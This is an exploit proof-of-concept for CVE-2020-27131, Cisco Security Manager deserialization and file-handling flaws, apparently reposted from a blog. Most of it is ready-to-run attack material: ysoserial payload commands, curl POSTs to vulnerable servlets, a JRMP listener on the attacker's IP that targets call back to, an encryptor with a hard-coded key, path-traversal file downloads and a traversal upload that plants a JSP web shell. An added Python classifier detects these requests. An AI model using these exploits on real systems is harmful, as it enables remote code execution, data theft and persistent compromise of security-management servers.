CVE-2020-27131 Cisco Security Manager deserialization vulnerability POC

    Introduction

    Cisco Security Manager is an enterprise-class security management application that provides insight into and control over Cisco security and network devices. Cisco Security Manager provides comprehensive security management (configuration and event management) across a wide range of Cisco security devices, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series sensor appliances, Cisco Integrated Services Routers (ISR), Cisco Firewall Services Modules (FWSM), Cisco Catalyst and other Cisco switches, and more. Cisco Security Manager lets you efficiently manage networks of all sizes, from small networks to large networks containing hundreds of devices.

    POC

    SecretService.jsp deserialization vulnerability

    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils

    curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp

    CsJaasServiceServlet deserialization vulnerability

    Compile JaasEncryptor.java after replacing the b64Payload value with your own base64-encoded serialized payload:

    import java.security.InvalidKeyException;
    import java.util.Base64;
    import com.cisco.nm.cmf.security.jaas.BlobCrypt;

    public class JaasEncryptor {

        public static void main(String args[]) {
            // Base64 of the serialized object to wrap; replace with your own (output of the JRMPClient step below)
            String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

            byte[] payload = Base64.getDecoder().decode(b64Payload);
            // Hard-coded 16-byte key passed to BlobCrypt
            byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};

            // Encrypt the serialized bytes the way the servlet expects and print them base64-encoded
            byte[] enc = BlobCrypt.encryptArray(payload, key);
            System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
            // Decrypt again as a sanity check; the result is not used further
            byte[] dec = BlobCrypt.decryptArray(enc, key);
        }
    }
    

    Prepare JRMP Listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:443' | base64 -w0

    Compile and run the encryptor to produce the encrypted payload:

    javac -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor

    Send the payload to the servlet with the parameters cmd=data, followed by a newline, followed by data=[ENCRYPTED_PAYLOAD].

    AuthTokenServlet deserialization vulnerability

    Prepare JRMP Listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2

    Send request:

    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet

    ClientServicesServlet deserialization vulnerability

    Prepare JRMP listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3

    Send request:

    curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet

    CTMServlet deserialization vulnerability

    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2

    curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'

    XdmConfigRequestHandler arbitrary file download

    GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]

    XdmResourceRequestHandler arbitrary file download

    GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta

    XmpFileUploadServlet arbitrary file upload

    Write a web shell, e.g.

    POST /cwhp/XmpFileUploadServlet?maxFileSize=100

    A normal multipart upload, e.g. writing the web shell by setting the filename to ../../MDC/tomcat/webapps/cwhp/testme.jsp.

    XmpFileDownloadServlet arbitrary file download

    GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1

    This will respond with a ZIP file containing all files from the directory.

    SampleFileDownloadServlet arbitrary file download

    GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]

    This will respond with a ZIP file containing all files from the directory.

    resultsFrame.jsp arbitrary file download

    GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]

    SecretServiceServlet deserialization vulnerability

    See also https://de.tenable.com/security/research/tra-2017-23

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2

    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet
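    As an added example (not part of the original post), a small request classifier a defender could run over proxied or logged traffic to flag the endpoints this PoC exercises: POSTs to the deserializing servlets, especially when the body starts with the Java serialization stream header, and ".." path segments in the file-download handlers' parameters or in an upload's multipart filename. The endpoint paths are the ones listed above; the sample requests are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Servlet paths from the PoC above that deserialize an attacker-supplied POST body.
DESERIALIZATION_PATHS = {
    "/CSCOnm/servlet/SecretService.jsp",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet",
    "/athena/CTMServlet",
}
# Handlers from the PoC that take a caller-controlled relative path for download or upload.
FILE_HANDLER_PREFIXES = (
    "/athena/xdmProxy/xdmConfig", "/athena/xdmProxy/xdmResources", "/athena/itf/resultsFrame.jsp",
    "/cwhp/XmpFileUploadServlet", "/cwhp/XmpFileDownloadServlet", "/cwhp/SampleFileDownloadServlet",
)
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"                 # java.io.ObjectOutputStream stream header
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")  # a ".." path segment (slash or backslash)
FILENAME = re.compile(rb'filename="([^"]*)"')           # multipart Content-Disposition filename

def classify_request(method: str, target: str, body: bytes = b"") -> list:
    # Returns alert tags for one request; an empty list means nothing matched.
    parts = urlsplit(target)
    path = unquote(parts.path)
    query_values = [v for vs in parse_qs(parts.query).values() for v in vs]  # parse_qs URL-decodes
    alerts = []
    if method.upper() == "POST" and path in DESERIALIZATION_PATHS:
        alerts.append("post-to-deserializing-servlet")
        if body.startswith(JAVA_SERIAL_MAGIC):
            alerts.append("java-serialized-body")
    if path.startswith(FILE_HANDLER_PREFIXES):
        alerts.append("file-handler")
        if any(TRAVERSAL.search(v) for v in [path, *query_values]):
            alerts.append("path-traversal")
        names = [n.decode("latin-1") for n in FILENAME.findall(body)] if path.startswith("/cwhp/XmpFileUploadServlet") else []
        if any(TRAVERSAL.search(n) for n in names):
            alerts.append("upload-filename-traversal")
    return alerts

# Constructed sample requests (not from the page): (method, request target, body).
SAMPLE_REQUESTS = [
    ("POST", "/CSCOnm/servlet/SecretService.jsp", JAVA_SERIAL_MAGIC + b"sr\x00..."),
    ("GET", "/athena/itf/resultsFrame.jsp?filename=..%2F..%2Fconf%2Fexample.txt", b""),
    ("GET", "/cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=reports&readmeText=1", b""),
    ("POST", "/cwhp/XmpFileUploadServlet?maxFileSize=100", b'--b\r\nContent-Disposition: form-data; name="f"; filename="../../webapps/cwhp/x.jsp"\r\n\r\nx\r\n--b--'),
    ("GET", "/cwhp/login.jsp", b""),
]

def scan(requests=SAMPLE_REQUESTS) -> dict:
    # Map each matching request target to its alert tags; clean requests are dropped.
    return {t: tags for m, t, b in requests if (tags := classify_request(m, t, b))}
```

    Run scan() on the sample set and the login page is the only request that produces no alert; a download of the "reports" directory is reported as a file-handler hit without traversal, so the tags separate use of these endpoints from abuse.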

    References

    https://www.zdnet.com/article/cisco-reveals-this-critical-bug-in-cisco-security-manager-after-exploits-are-posted-patch-now/

    Original post: https://www.cnblogs.com/potatsoSec/p/13997491.html